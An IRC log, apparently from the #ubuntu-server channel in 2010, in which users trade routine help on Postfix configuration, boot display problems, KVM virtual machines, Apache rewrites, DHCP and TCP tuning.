<incognito> RoyK: It looks like I need to disable the frame buffer by uncommenting the following line: # defoptions=quiet nosplash nofb in menu.lst and then update grub. Am I correct?
<jeiworth> doesn't help me here, i want to try to migrate one vm from the local machine to another server
<jeiworth> ...using virt-managers migration function
<jeiworth> hrhrhrrr
<incognito> RoyK: P.S. since I don't know what the color depth is
<incognito> I installed xorg xterm gdm icewm menu firefox gksu and synaptic on my server, and it froze up on the login page. Does any one have a suggestion? Should I use a different desktop manager?
<tanathos> hello
<RoyK>  
<tanathos> Hello RoyK, need help?
<RoyK> just ask
<tanathos> RoyK, I meant if you need help :) I am the guy that helped you to change the sql root password a few days ago
<RoyK> that wasn't me
<tanathos> oh sorry you were the one with deny hosts
<RoyK> I was
<RoyK> that works well, btw
<RoyK> except a bug in some installs
<tanathos> happy to hear that, today they upgraded the internet connection so I am :)))
<oryxtec> hi all
<oryxtec> i hve question... i m new to kvm and i m install kvm on my server
<oryxtec> please can come one tell me wht is this command vmbuilder kvm ubuntu -c vm2.cfg
<linux-x> hello,can some one help me,  i insalled ubuntu-server already, and configure DNS server and every thing working well, just i want now how setting mail server in simple steps,
<vlad> hi
<vlad> can anyone help with a 10.04 LTS 64-bit install problem?
<vlad> install doesn't mount dvd.  changing bios to 'ide' for sata does nothing
<vlad> helllooooooooo
<vlad> is there anybody IN here?
<vlad> just nod if you can hear me
<vlad> is there anyone at home?
<KurtKraut> vlad, if you need a quicker assistance, please, post your problem in a web forum with richful detail. www.ubuntuforums.org
 * _Techie_ nods
<vlad> i am first just trying to make a connection, my friend
<vlad> ;)
<vlad> in a chat room, one expects....well....chatting, not silence
<ajmitch> one expects patience from people as well
<_Techie_> well this isnt a chat room
<vlad> really?  xchat is NOT a chat client that connects to chat rooms?
<vlad> fascinating
<vlad> what have i connected to, buddy?
<_Techie_> im not having a go at you
<_Techie_> im just saying that some people dont like offtopic chat
<vlad> i have no "off topic" chat
<lifeless> in a technical sense it is; in a social sense there are many people who are logged in but not paying active attention to the channel
<vlad> it is on topic
<vlad> i can't install 64-bit 10.04 server, and haven't found info on the net about it
<vlad> was directed here by a ubuntu.com pg
<vlad> i am absolutely AMAZED by your lack of social grace and desire to be at least minimally helpful
<vlad> have fun hanging out in a chat room, whining at people who try to chat.
#ubuntu-server 2010-09-07
<jeiworth> tzz n00bs
<dragonmind> some Ger here?
<uvirtbot> New bug: #632051 in openldap (main) "slapd dist-upgrade chown: invalid argument: `'" [Undecided,New] https://launchpad.net/bugs/632051
<WalterN> https://help.ubuntu.com/10.04/serverguide/C/postfix.html
<WalterN> going though that
<WalterN> the second thing it wants a mail name...
<WalterN> the description says 'the mail name is the domain name used to qualify all mail addresses without a domain name'
<WalterN> what does that mean?
<WalterN> oh, this is in dpkg-reconfigure postfix
<JanC> WalterN: the domain that applies to mail addresses with no @something part
<WalterN> what if I have more than one domain to be used for email?
<JanC> normally that's only used for local mail on the server
<WalterN> wait... what?
<JanC> did you ever send mail to "walter" instead of "walter@example.com" ?  ;)
<WalterN> no?
<WalterN> never did any of this before
<WalterN> as may be obvious
<WalterN> (heh)
<JanC> the default proposed by dpkg-reconfigure is probably okay then
<WalterN> still not sure what its for though..
<WalterN> network wide email?
<JanC> well, for example many daemons (services) will send mail to "root" or similar accounts when there is an issue
<JanC> and you can actually send mail to every local user on the server
<WalterN> default is what I named the computer
<WalterN> "server"
<WalterN> heh
<JanC> with this you can what the "complete equivalent" with an @ of the version without @ is
<WalterN> the domain I want to use for email is tiwake.com though
<JanC> you can probably use that then
<pmatulis> JanC: i don't think that example applies.  sending to just a username will default to local accounts.  i think what WalterN is talking about is 'myorigin' (i've never heard of 'mail name')
<_Techie_> sorry to pitch in so late in the game
<_Techie_> but "the description says 'the mail name is the domain name used to qualify all mail addresses without a domain name'" to me implies, if you send mail from a user without having a masquerade domain assigned, use this domain instead
<WalterN> I just put in tiwake.com
<WalterN> hmm
<JanC> WalterN: that should be okay
<WalterN> the next screen says 'mail for the postmaster, root, and other system account needs to be redirected to the user account of the actual system administrator'
<_Techie_> make this your username
<WalterN> if this value is left empty, such mail will be saved in /var/mail/nobody, which is not recommended
<WalterN> hmm
<JanC> AFAIK you can put another e-mail account you use there
<JanC> I'm not sure how it edits /etc/aliases
<JanC> basically, this is where to send mail with errors or warnings about your server
<WalterN> oh, ok
<WalterN> one of the next screens says...
<WalterN> please specify the network blocks for which this host should relay mail. the default is just the local host, which is needed by some mail user agents. the default includes local host for both ipv4 and ipv6.
<WalterN> what is that?
<JanC> WalterN: most likely you should leave that alone
<JanC> WalterN: it means what computers are allowed to send mail through your mail server
<JanC> (without authentication etc.)
<JanC> normally you don't want random spammers to abuse your server  ;)
<WalterN> the default value is a bit different from https://help.ubuntu.com/10.04/serverguide/C/postfix.html
<WalterN> default is 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
<WalterN> that says to use 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128 192.168.0.0/24
<JanC> yeah, that's okay, leave of the 192.168.0.0/24 part
<WalterN> what does that mean though?
<JanC> that's useful if you have a LAN, and want PCs in your LAN to use the mailserver as a relay
<WalterN> oh
<WalterN> interesting
<WalterN> no, I dont think I will ever want to relay
<JanC> and of course it only works if your LAN is using 192.168.0.0/24
<WalterN> hmm
<WalterN> please choose the character that will be used to define a local address extension
<WalterN> default is +
<WalterN> when is that used?
<JanC> WalterN: if you enter "+" there, the mailserver will cut the "+" plus everything after it up to the "@" from the mail address and use what's left as teh account
<JanC> so mail for walter+ubuntu@example.com will end up in the mailbox of walter@example.com
<WalterN> oOo
<WalterN> cool
<JanC> some people use that to filter mail, or when ou have to register at soem site, you can see afterwards who that spam is coming from  ;)
<JanC> (of course, some spammers know that trick too, by now...)
<WalterN> ok, back to the wiki...
<WalterN> https://help.ubuntu.com/10.04/serverguide/C/postfix.html
<WalterN> "Now is a good time to decide which mailbox format you want to use. By default Postfix will use mbox for the mailbox format. "
<WalterN> what is mbox?
<JanC> that will put all mail in a mailbox in one file
<JanC> so it's a file format to store mail
<WalterN> oh, ok
<JanC> the alternative is "maildir", which stores each mail in its own file inside a directory
<WalterN> which is preferred?
<WalterN> I guess it does not really matter..
<WalterN> I'll just leave it I guess
<JanC> it might matter depending on what you want to do with that mail
<netritious> Hi, recently inherited a Snap Server 4200 I'm trying to install Ubuntu server on. I'm wondering if anyone here has tried such a thing?
<tanathos> hello everyone :)
<WalterN> ok, I'm at step 2 now..
<WalterN> https://help.ubuntu.com/10.04/serverguide/C/postfix.html#postfix-smtp-authentication
<WalterN> ugh, annoying
<netritious> WalterN: might help http://tinyurl.com/29am43s
<netritious> that is, if you aren't using self-signed certificates
<lsmobrian> does anyone know how to login into launchpad using command line.  I enter my username/password however after that theres nothing to do.  "continue" is not a link.  I am using w3m trying to submit some bug info using apport-collect
<shauno> lsmobrian: login works normally for me in elinks.  'continue' is a submit button, not a link
<lsmobrian> Ill give elinks a try (as well as looking to submit/links in w3m)  thanks for taking a look
<lsmobrian> shauno: thanks that did work
<ratdog> http://paste.ubuntu.com/489556/
<ratdog> ?
<incognito> okay, here is my paste:   http://paste.ubuntu.com/489561/   first you can see the result of my dmesg | grep vga.   below my terminal output is a post from an ubuntu forums that tells how to disable frameBuffer.  I'm trying to disable the framebuffer because my ubuntu-server won't load. I need help to know what I need to blacklist. Thanks
<ratdog> i pasted firat
<ratdog> damnit
<ratdog> lol
<incognito>  I burned and installed 10.04 installation CD. The installation seems to run fine, ejects my CD and tells me to boot into my newly installed system. The first boot runs normally and I get a command-line interface in the right resolution (1024 x 768). My server is.
<incognito> But on the second and any following (re)boot, the system fails to load. After my HP splash screen it shortly shows a blinking cursor on a black screen. Then the screen goes completely black, my monitor starts searching for input and goes to standby. I use the power button to shut down.
<SJr> How do I make a file system dirty so that fsck runs on reboot?
<kklimonda> SJr: touch /forcefsck
<SJr> seriously?
<twb> Yes.
<SJr> neat
<kklimonda> yeah, but it will force fsck on all filesystems afair
<twb> It used to be an option to shutdown(8), but SJR removed it and the documentation for it
<SJr> hmmmmm
<SJr> SJR?
<twb> On debian, it says -F:      Force fsck on reboot.
<twb> Scott James Remnant
<SJr> ah
<twb> i.e. "the upstart guy"
<SJr> ah
<SJr> sorry I was understandably confused :)
<twb> Nod
<kklimonda> hmm, I've always touched file manually :)
<twb> I think his nick is actually "keybuk"
<kklimonda> indeed
<SJr> will that run even if the file system is clean?
 * twb encourages MIT-style usernames
<twb> SJr: yes
<kklimonda> SJr: yes
<twb> SJr: it's *force*fsck
<SJr> excellent well thank you, I'm going to reboot my server, killing my bouncer, and hopefully fixing my fs
<SJr> god speed
<twb> Basically the boot scripts say "if /forcefsck exists, then add -f to the fsck calls"
<kuttan_> Hi what is JIGDO/JIGDO-LITE , can this tool be used to download a bootable Os installation DVD ?
<twb> kuttan_: jigdo takes a list of packages and turns it into an install CD or DVD
<twb> I prefer to simply use the mini.iso and have a local package mirror exported via HTTP
<kuttan_> twb: Thanks mate! , So it will download individual packages and then regenerate DVD ?
<twb> s/regenerate/generate/, yes
<twb> Note that we're talking about debian-installer (not ubiquity) install media.
<kuttan_> twb: Thanks mate. that is all I wanted to know. Was bit jittery before that :)
<SJr> Um
<SJr> When I try to md5 a file, I Get an input output error, and I get spammed with a bunch of stuff like: http://www.pastebin.ca/1934852
<joschi> SJr: either your SATA controller or your hard disk is broken
<SJr> lame
<joschi> SJr: if you don't have one yet, you should make a backup of your important files on that disk *now*
<SJr> hmmmmm
<joschi> SJr: could also be a defect cable.
<SJr> sorry it just seems to be one file that is affected
<SJr> and an fsck seems to generate no errors
<joschi> SJr: that's how it starts usually
<SJr> smart seems to pass
<joschi> SJr: it's your decision what to do next...
<huats> morning !
<tanathos> morning
<rahman> Hi,with apache how can I rewrite all requested urls to a fixed url without any condition to check? Like  "  *   to example.com  "
<sandGorgon> anyone have an upstart script for postgresql ?
<soren> jdstrand: Because I suck, when you bzr update your libvirt packaging branch, you will get conflicting tags. Please fix it like so: bzr tag --force -r revid:james.westby@ubuntu.com-20100831160524-ran41ea0u7thgb4c 0.8.3-1ubuntu9
<twb> rahman: in mod_rewrite or something?
<soren> rahman: RewriteRule .* http://whatever [R,L]
<soren> rahman: Or thereabouts.
<twb> I see bzr still looks like arch sometimes :-P
<soren> twb: He could have probably gotten away with -r 101.
<soren> twb: ..but I wanted to be sure.
<twb> And of course an eight-byte hash *might* have had a collision :P
<soren> twb: Yeah, bzr has no such concept, as far as I know.
<rahman> soren: thanks it made the trick . Apache url rewriting docs are so crypted if you don't know RegEx and all you need is simple :)
<twb> Anyone who doesn't know regex(7) probably shouldn't be configuring apache
<rahman> twb: :)
<twb> I'm not joking
<twb> Large parts of my week consist on fixing systems deployed or managed by people who don't really know what they're doing
<uvirtbot> New bug: #632297 in drbd8 (main) "package drbd8-utils (not installed) failed to install/upgrade: trying to overwrite '/usr/share/cluster/drbd.sh', which is also in package rgmanager 0:3.0.2-2ubuntu3" [Undecided,New] https://launchpad.net/bugs/632297
<uvirtbot> New bug: #632314 in openldap2.3 (main) "slapd Too many open files" [Undecided,Invalid] https://launchpad.net/bugs/632314
<sandGorgon> can I set stack size using sysctl.conf - I know we can do it using ulimit -s, but just curious if we can. That way I just need to copy over my sysctl.conf and have all my settings
<silvan> salve ragazzi
<silvan> c'Ã¨ nessuno!?
<zul> morning
<patdk-wk> hmm, cause someone asked the other day about this: https://help.ubuntu.com/10.04/serverguide/C/mail-filtering.html
<patdk-wk> I am wondering why that says to activate the spamassassin daemon?
<patdk-wk> that configuration doesn't use spamd anywhere at all
<patdk-wk> spamd will be a useless memory hog
<soren> patdk-wk: amavis doesn't use spamc?
<patdk-wk> nope, never has
<soren> That's silly.
<patdk-wk> amavis is perl
<soren> so?
<patdk-wk> so it loads spamassasin perl directly into it
<soren> Oh.
<patdk-wk> that gets fun with stuff like compiled spamassasin rules and stuff
<patdk-wk> http://mail-archives.apache.org/mod_mbox/spamassassin-users/201001.mbox/%3C4B43FA52.40401@verizon.net%3E
<patdk-wk> I can't find any direct documentation that says spamc/spamd is not used
<patdk-wk> but I do have spamd disabled on all my servers
<zul> hggdh: ping up yet?
<_ruben> patdk-wk: i figured (but not tested or anything) that amavis would/could use spamd when available
<patdk-wk> na, it won't use spamd ever
<hggdh> zul: up now
<zul> hggdh: see daviey's email?
<hggdh> no... looking at it
<_ruben> patdk-wk: ah, depending on the amavis config, it does the preloading stuff itself, killing any need for spamd .. guess a bug should be filed against the docs :)
<patdk-wk> :)
<patdk-wk> I normally take it a step more, I should file a bug against it too
<hggdh> zul: is this what I think? :-)
<patdk-wk> the daily autoupdate for spamassassin rules, I modify them to restart amavisd instead
<zul> hggdh: hehe
<hggdh> zul, Daviey: as it happens, yes, there a re open slots at the UEC test rig
<zul> hggdh: sweet...
<Daviey> hggdh, \o/
<hggdh> now, when would you like to have at it?
<hggdh> zul, Daviey: now?
<zul> hggdh: sure
<Daviey> hggdh, I really don't want to block you
<hggdh> Daviey, zul: no, you will not block me. Now, do you want me to reinstall the machines as minimal servers?
<zul> hggdh: yes please
<hggdh> (takes about 20 min to reboot & reinstall)
<hggdh> doing it
<Daviey> hggdh, fresh maverick daily?  no UEC?
<hggdh> anyway, my last test wass really destructive
<Daviey> hggdh, If you need it back, can you try and give us about 1hrs notice to pull of anything we need?
<hggdh> Daviey: minimal Ubuntu daily server, no UEC
<Daviey> hggdh, \o/
<hggdh> Daviey: yes, I can give you 1 hour's notice
<hggdh> zul, Daviey: machines are beign reinstalled now. Do you know how to get there?
<zul> hggdh: nope
<hggdh> just a sec
<Daviey> \o/
<chessychic> well as per competition goes RHEL still dominates the server market
<chessychic> its becoming hard to configure ubuntu for server
<chessychic> by the way ubuntu handling packages and updating in server environment
<Daviey> chessychic, Is there a question here?
<chessychic> i mean i dont know how to fix a pc with improper grub
<patdk-wk> I haven't seen RHEL on a lot of servers, just centos
<patdk-wk> you fix grub, the same way on rhel, centos, ubuntu, debian, slackware, .... :)
<Daviey> chessychic, Okay... i'm worried i'm stepping into a trap here..
<Daviey> "improper grub"?
<chessychic> ya grub 2
<Daviey> chessychic, And which part is improper?
<chessychic> did just ubuntu server upgraded to grub2
<Daviey> no
<chessychic> can we rescue ubuntu server with server disc
<Daviey> LTS->LTS yes.
<Daviey> But it's been the default since 9.10
<hggdh> .msg daviey https://pastebin.canonical.com/36805/
 * Daviey passes hggdh a /
<hggdh> heh
<hggdh> well, you are msg-ed, anyway :-)
<Daviey> chessychic, Can you clarify what part of grub2 makes it improper?
<hggdh> zul, Daviey: of course, please change the userId on the .ssh/config
<chessychic> sorry but nothing is wrong here
<Daviey> zul, we should use hggdh's ID, then he gets the blame if it goes bang.
<chessychic> i want to know if something goes wrong it isnt as easy as grub to fix
<zul> Daviey: sounds good to me :)
 * hggdh goes and quickly removes self from server
<Daviey> chessychic, It does differ from grub1 configs
<chessychic> iam learning system admin course here
<Daviey> chessychic, sounds good!
<chessychic> wanna be a linux admin,also iam working with RHEL here so i also wanted to configure and get my hands on ubuntu server
<chessychic> first off i wanna change my alias here
<chessychic> scared 2 go for redhat certification as iam not confident .............
<chessychic> also ubuntu certification is bit complicated and highly priced rather i should have been cheap for poor countries
<chessychic> it*
<hggdh> zul, Daviey: machines have rebooted on today's ISO
<Daviey> hggdh, \o/
<ttx> Daviey: when is the next euca upload planned ?
<Daviey> ttx, hopefully today!
<ttx> Daviey: ack.
<Daviey> working on it right now
<kaushal> hi
<kaushal> how do i delete VM in KVM under Ubuntu ?
<yann_> virsh destroy / undefine
<kaushal> error: unexpected data 'undefine'
<kaushal> at virsh command line ?
<yann_> virsh undefine nameofthevm
<sherr> ---> man virsh
<yann_> but that removes the vm from libvirt, you stillneed to rm -rf the file after
<kaushal> ok
<kaushal> where exactly i need to rm -rf ?
<kaushal> under /etc/libvirtd/ ?
<yann_> where you put your image file
<kaushal> yann_: not sure where i have it :(
<kaushal> i use vmbuilder command
<yann_> virsh dumpxml vm
<yann_> will tell you
<uvirtbot> New bug: #327823 in vsftpd "init: support job output being passed to start/initctl invocation" [Medium,Confirmed] https://launchpad.net/bugs/327823
<kaushal> error: failed to get domain 'vm1'
<kaushal> hi again
<kaushal> sorry got disconnected
<kaushal> yann_: any further suggestion
<sherr> VM's : ls /etc/libvirtd/qemu/*.xml
<sherr> Or : virsh list
<sherr> etc. See : man virsh
<kaushal> sherr: Thanks
<kaushal> yann_: Thanks
<Glenjamin> Hi guys, i've just upgraded from 9.04 to 9.10 on the way to 10.04, and i'm getting the following from apt: http://ubuntu.pastebin.com/is0hFz8h anyone able to point me in the right direction?
<SpamapS> Glenjamin: looks like maybe some files were manually removed?
<Glenjamin> well apt seemed to be fine before i did the 9.04 -> 9.10 update, then i had this error afterwards while trying to do anything
<Glenjamin> and now i can't seem to do anything without it trying to remove these packages and failing
<patdk-wk> hmm, it seems to think those kernel packages are installed, but looks like they got manually removed though
<patdk-wk> someone enjoying their usage of rm? to clean up old kernels?
<Glenjamin> is there any way to put them back?
<patdk-wk> maybe, apt-get remove -m linux-restricted-modules-2.6.28-11-server
<patdk-wk> then again for -15, and -17
<Glenjamin> it does the same - any apt operation tries to remove the three packages
<Glenjamin> is trying to create the paths it's attempting to unlink likely to help?
<patdk-wk> oh, maybe you need an apt fix first then
<Glenjamin> managed to bungle a fix by copying another module into where it was supposed to be
<derknecht> i try to control mainboard leds to tell the user when a backup is finished on a server without gui. I searched /proc and /sys but found nothing. is there a software package or a way how i can achive this
<SpamapS> derknecht: it is different between chipsets.
<derknecht> SpamapS: where i have to search?
<SpamapS> derknecht: you can very easily control keyboard LED's.. ;)
<patdk-wk> mainboard leds? sounds odd
<derknecht> there is no keyboard, everything is over ssh
<SpamapS> patdk-wk: remember back when all computers had green, yellow, and red? ;)
<SpamapS> derknecht: what lights are visible?
<patdk-wk> SpamapS, I'm trying, but all I remember is a red and green, one power, one harddrive (my current ones are still the same)
 * SpamapS once made a program that would, blink the blue lights on HP proliants in sequence according to their rack order.. 
<patdk-wk> but back then, the harddrives normally had a led on them also :)
<SpamapS> patdk-wk: yeah, you'd run that litlte cable from the hard drive to the LED.. or if you had a fancy controller.. from the controller
<patdk-wk> my mfm and scsi drives back in the day, all had led's directly on them, the cable was optional :)
<derknecht> SpamapS: let assume my mainboard and kernel can do it. How ? (via /proc or /sys? via extra software that controls a spesific led?)
<SpamapS> derknecht: I'd guess you'd need to issue some sort of APM or ACPI command
<patdk-wk> normally you need a kernel module that supports it
<patdk-wk> then you just toggle it via /sys
<patdk-wk> atleast if it's like the thinkpad :)
<RoAkSoAx> kirkland: howdy!! I was wondering if you've ever used systemtap ?
<SpamapS> http://ubuntuforums.org/archive/index.php/t-539425.html
<SpamapS> right that one shows it for an asus
<cemc> if I have static network config, do I need avahi-daemon ?
<cemc> or what do I need avahi for?
<jpds> Auto-discovery of local network devices?
<cemc> I see
<jpds> cemc: 'avahi-browse -a' will show you devices/things it found for instance.
<cemc> I guess I just want to know if I can remove it from a LTSP server without having problems with anything after that
<cemc> not remove it but stop it from running by default
<patdk-wk> most likely :)
<cemc> patdk-wk: I like that answer :-) what about atd ? I did not really see anything using that (I mean nothing what I'm using).
<patdk-wk> depends on what you do
<patdk-wk> if you never use at, then you don't need atd I believe
<patdk-wk> not exactly sure how the ubuntu cron works, I think I remember freebsd cron was built on at, or at ontop of cron
<cemc> mmm, not sure, I think they are two separate things
<ethicalhack3r> hello all, trying to install *only* x server so that I can install openbox on ubuntu server minimal, 'apt-get install xorg' also installs gnome, any way to stop apt-get installing gnome as well as x server
<ethicalhack3r> ?
<cemc> ethicalhack3r: try installing something like xserver-xorg-core
<ethicalhack3r> cemc: thanks! just read about installing 'gdm', any thoughts?
<patdk-wk> hmm, doing xfce seems to not install much gnome stuff, only one or two items
<cemc> ethicalhack3r: not sure, I would start out with only minimal stuff, check with apt-get depends gpm , you'll see what that pulls in
<uvirtbot> New bug: #632554 in tomcat6 (main) "tomcat fails to start with: /bin/bash already running." [Undecided,New] https://launchpad.net/bugs/632554
<patdk-wk> xfce doesn't pull in gdm :)
<ethicalhack3r> cemc: trying xserver-xorg-core now, thanks!
<cemc> maybe that won't be enough, but you'll find out I guess. or you could try what patdk-wk said. install xfce, then remove it if you don't need it, that way you should get an actual working X I guess
<ethicalhack3r> I will see what it gives me, if its not enough I will look into xfce, think xfce is much larger than openbox/fluxbox?
<ethicalhack3r> if I had the choice I wouldnt be installing any window managers at all, but needs must :(
<cemc> ethicalhack3r: try twm :-P
<Proxymalz> good evening, need german support plz query me
<cemc> doesnt get more basic than that, hehe
<Pici> !de | Proxymalz
<ubottu> Proxymalz: In den meisten ubuntu-KanÃ¤len wird nur Englisch gesprochen. FÃ¼r deutschsprachige Hilfe besuchen Sie bitte #ubuntu-de, #kubuntu-de, #edubuntu-de oder #ubuntu-at. Geben Sie einfach /join #ubuntu-de ein! Danke fÃ¼r Ihr VerstÃ¤ndnis.
<ethicalhack3r> argh! some how gnome has snook on my system again, its like the friggin plauge!
<cemc> :)
<ethicalhack3r> will see how much space gnome takes up, might be smaller than I am anticipating
<cemc> unlikely :)
<cemc> ethicalhack3r: why do you need X anyway?
<ethicalhack3r> cemc: I am creating a live cd for DVWA (http://www.dvwa.co.uk), I'm doing a workshop using the livecd where there is no network connectivity, so I need a browser on the live cd for the audience to interact with the application
<cemc> ethicalhack3r: it's all in the browser, you don't need anything else?
<ethicalhack3r> cemc: yea, just need firefox
<cemc> ethicalhack3r: maybe you could try running firefox directly, without any desktop/window manager? if there are no other windows/popups, it might work
<cemc> ;)
<ethicalhack3r> cemc: you think firefox would run without a window manager? the reason I also need the livecd to be as small as possible is because the iso will be available for download, so the smaller the final iso is, the better
<cemc> just put an .xsession file in the user's home, run firefox from that, then startx, and you'll see...
<cemc> maybe a fullscreen firefox, if you can start it directly in fullscreen somehow
<ethicalhack3r> cemc: found a nice tut :) => http://fluxbox.sourceforge.net/docbook/en/html/app-setup.html
<cemc> mhm
<Shane-S> trying to figure out what my IP's went DHCP, http://ubuntu.pastebin.com/tmH0YHkF is my /etc/network/interfaces file. I have 2 ubunut LAMP 10.04 servers, same setup, just .11 and .12 for IPs. Both resorted back to DHCP over the weekend, not sure why
<Shane-S> when I did ifdown eth0 and ifup eht0 both came back to their static addresses
<Shane-S> all I can guess is that I never restarted the systems after the interfaces file change, I just used ifdown/up
<qman__> make sure dhcp processes aren't still running
<Shane-S> gonna sound dumb, how do I do that?
<qman__> ps aux | grep dhc
<jeiworth> Shane-S: also, having servers with static ip here as well i recommend deinstalling dhcp client alltogtether, no need for it anyway
<qman__> dhclient can be very persistent
<qman__> hate to forfeit some linux geek cred, but rebooting is the easiest way to defeat it
<Shane-S> okay...I got 1 reply to the command
<qman__> probably the grep
<jeiworth> qman__: that's just wrong ;oP
<jeiworth> rebooting...brrrrrrr
 * jeiworth shivers
<qman__> restarting the networking service is supposed to fix it, but it doesn't always work
<jeiworth> Shane-S: sudo aptitude purge dhcp3-client
<jeiworth> Shane-S: and never any more problems
<Shane-S> okay will do that jeiworth ...sorry for delay got a help desk call
<jeiworth> don't worry
<Shane-S> so the client can actually make the server obtain and address sometimes, that is weird
<Shane-S> I thought config files rules processes/services :P
<Shane-S> well I will test it on one of the servers, and leave the other be, then see if that solved it, they are identical VMs, just running different webservices
<Shane-S> Thank you all for the help!
<Shane-S> Irony is I got the help desk call, because it was my OSTicket server that changed to DHCP :P
<jeiworth> <Shane-S> I thought config files rules processes/services :P <-- yeah, i thought this behaviour to be quite strange also, hence the somewhat radical approach but in the end, since it's a server and uses static ip there is no need for the dhcp client running all the time in the background anyway.
<jeiworth> less being installed in the first place, even
<jeiworth> waste of resources ;)
<cswells> Hello is this Ubuntu server support?
<Pici> cswells: Yessir.
<cswells> When i start the install process. It pushes all the text to one side of the screen making it impossable to read the prompts
<cswells> i tried vga=771, fb=False, and start_pcmcia=false
<cswells> is there a way to manualy set the res lets say 800x640?
<qman__> cswells, with 10.04, use nomodeset
<cswells> ill give it a try
<qman__> it's a new feature to support modern displays, but unfortunately, compatibility isn't that great
<qman__> and it only works with the open source nvidia and ati drivers
<cswells> nope... just made the part of the screen it doesn't use green
<patdk-wk> I finally got mine working nice with my nvidia card using nvidia drivers
<patdk-wk> but for servers, ya, nomodeset, and maybe gfxmode=text
<qman__> it shocked me with the 1280x800 text console
<qman__> but then installing nvidia binary drivers put it back to 80x25
<qman__> (on my laptop)
<qman__> I would complain but it's about time the linux console supported more than SVGA
<cswells> gfxmode=text didn't work ether
<qman__> nomodeset should be giving you a standard 80x25 terminal
<cswells> its an old Acer aspire 5000
<cswells> yeah but its only apearing on 1/8th of my monitor
<cswells> the other 7/8 th's is unused
<qman__> right in the center?
<cswells> 1/8 th on the left
<cswells> the rest on the right is unused
<qman__> sure the display is okay? also, what graphics chip is it?
<cswells> its a via
<cswells> yeah the display works fine with ubuntu desktop
<cswells> but i want to use my old laptop as an ftp storage
<cswells> that i can access from school
<qman__> so X can handle it but the ttys are no good?
<cswells> i guess
<qman__> did you try the terminals from within ubuntu desktop?
<cswells> yeah
<cswells> everything in Desktop is good
<qman__> ctrl alt F1, etc
<cswells> but server i cant install because it is smushing everthing together on the left of the screen
<cswells> yeah i believe so let me check real fast
<cswells> havn't formated the drive yet
<cswells> oh the ttys are bad in desktop aswell
<cswells> but X looks good :)
<qman__> well then, it's definitely a graphics issue
<cswells> yeah
<qman__> I ran into something similar with a radeon 200M, the solution was to use open source drivers instead of fglrx
<qman__> but with a via chip, not really sure what you can do
<cswells> should i try ubuntu server 8 lts
<qman__> maybe pass some parameters to the module
<qman__> worth a try
<qman__> 8.04 doesn't have plymouth and the new KMS
<cswells> my only fear is... if i upgrade to 10
<cswells> it breaks it :(
<qman__> it will
<qman__> you'd have to stick with 8.04
<qman__> it's got about three years worth of support left, far as updates are concerned
<qman__> so as long as the major software versions and feature set are good enough, you could use it
<cswells> i cant find the download link on ubuntu's site
<cswells> for 8
<cswells> maybe sourceforage?
<qman__> nah, one sec
<kklimonda> !hardy
<ubottu> Ubuntu 8.04 LTS (Hardy Heron) was the eighth release of Ubuntu. Downloading: http://releases.ubuntu.com/8.04 - See !lts for more details.
<qman__> the site burys it a bit
<kklimonda> cswells: ^^
<qman__> ah, there you go
<cswells> awww shucks guys you make my blush :)
<cswells> ah ha, ubuntu server 8 burned to disk
<cswells> same issue
<mconigliaro> is anyone using ubuntu 10.04 on ec2? there used to be a script at /etc/init.d/ec2-init that ran the user data script, and it would log to /var/log/messages. this seems to have changed in 10.04, and now i have no idea how the user data script is being run or where its output is going...
<mathiaz> smoser: hi - trying to use the puppet user-data hook on maverick: http://paste.ubuntu.com/490006/
<smoser> mathiaz, http://paste.ubuntu.com/490007/ . yeah. sorry. :-(
<smoser> you want to open a bug for me ?
<mathiaz> smoser: sure - how can I fix it?
<mathiaz> smoser: bzr branch?
<smoser> well, test that pastebin fix.
<smoser> i'm guessing thats all you need.
<smoser> i can build a new cloud-init if you'd like asap.
<mathiaz> smoser: ok - I'll test that and let you know about the results
<_Techie_> anybody in here want to rage at me for having my nick change when i connect/disconnect to my BNC?
<ajmitch> _Techie_: nick changes can be ignored, public away messages in channel are what annoy most people
<_Techie_> ajmitch: cool, because one of the tech's in #xubuntu went off at me when i connected to my BNC
<ajmitch> how silly
<_Techie_> i know, i said goodbye to one of the tech's that i respect highly in there and left
<new_to_irssi> part
<_Techie_> is 9.10 still supported, and if it is... when till?
<soren> _Techie_: It's supported for 18 months (starting October 2009).
<soren> _Techie_: So until April 2011.
<_Techie_> soren: thanks
<Kaelten> anyone have any advice about how to tweak net.ipv4.ip_local_port_range and net.ipv4.tcp_fin_timeout
<Kaelten> I need to maximize my servers ability to connect to a given db server
<Kaelten> not sure what's safe settings on them though
<SpamapS> Kaelten: err, why would you want to DoS your db server from one box?
<SpamapS> Kaelten: there are a number of ways to pool connections so you don't need many thousands...
<Kaelten> SpamapS: I'm dealing with third party php applications mainly
<Kaelten> and pconnect isn't solving the bottlenecks
<Kaelten> SpamapS: so I'm open to suggestions on how to pool them
<SpamapS> Kaelten: pconnect often makes it worse. ;)
<Kaelten> i'd beleive it
<SpamapS> 3rd party your options aren't so great
<Kaelten> so I either tweak the tcp stack, or I try not great, or I throw more ips at it
<SpamapS> Kaelten: if you have any sway over the app design at all, I like using things like gearman or dbslayer to control and coalesce db access... but if you are stuck with apps using mysql_* then there's not much hope.
<SpamapS> you're fighting a losing battle there
<Kaelten> yup
<Kaelten> but that's the job description
<SpamapS> mysql will eat up ram per connection pretty fast if you let it
<Kaelten> db boxes have ungodly amounts of ram
<Kaelten> the fact I've gotten vbulletin to scale as much as it has is pretty impressive in my book, and honestly I may be worrying about a bottleneck that'll never be there.
<SpamapS> Kaelten: I've heard a few people who have had success with this: http://httpd.apache.org/docs/2.2/mod/mod_dbd.html
<Kaelten> hrm, I don't run apache though :/
<Kaelten> I saw that mysql proxy has a lua script that does some form of pooling
<Kaelten> but that seems fishy
<SpamapS> Oh you're running, what, fastcgi?
<SpamapS> mysql proxy isn't fishy, but it is REALLY damn slow
<Kaelten> fpm behind an nginx server
<Kaelten> currently I'm dealing with net.ipv4.ip_local_port_range = 32768    61000 and a timeout of 60
<Kaelten> which seems pretty reasonable defaults
<Kaelten> but there is a point where it starts to teeter out
<SpamapS> Kaelten: why are your timeouts so high?
<SpamapS> I'd be at 3 - 5 seconds
<Kaelten> well I'm talking about net.ipv4.tcp_fin_timeout
<SpamapS> those timeouts don't apply when the database is actually doing something
<SpamapS> still for a LAN...
<Kaelten> ya it's all gigabit lan traffic
<Kaelten> I was debating turning it down lower
<Kaelten> part of the reason I asked for input :)
<SpamapS> also for a LAN tw_recycle and tw_reuse are fine
<Kaelten> not familure with those two
<Kaelten> any thoughts on what a safe tcp_fin_timeout should be
